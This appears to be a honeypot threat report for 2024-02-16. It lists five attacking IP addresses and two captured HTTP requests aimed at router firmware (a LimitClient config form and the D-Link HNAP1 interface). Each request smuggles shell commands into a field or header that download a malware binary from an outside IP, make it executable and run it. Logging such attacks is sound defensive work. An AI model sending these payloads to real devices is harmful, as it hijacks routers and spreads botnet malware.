Top 5 IPs for 2024-02-16:

134.209.34.154
153.187.142.241
220.133.164.45
101.178.0.17
124.44.33.232

Malcious Commands seen:

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.178.235.32/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;

POST /HNAP1/ HTTP/1.1
Host: HOST-IP
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://31.220.3.140/multi;chmod 777 multi;sh multi dlink;rm -rf multi`\"
Content-Length: 0

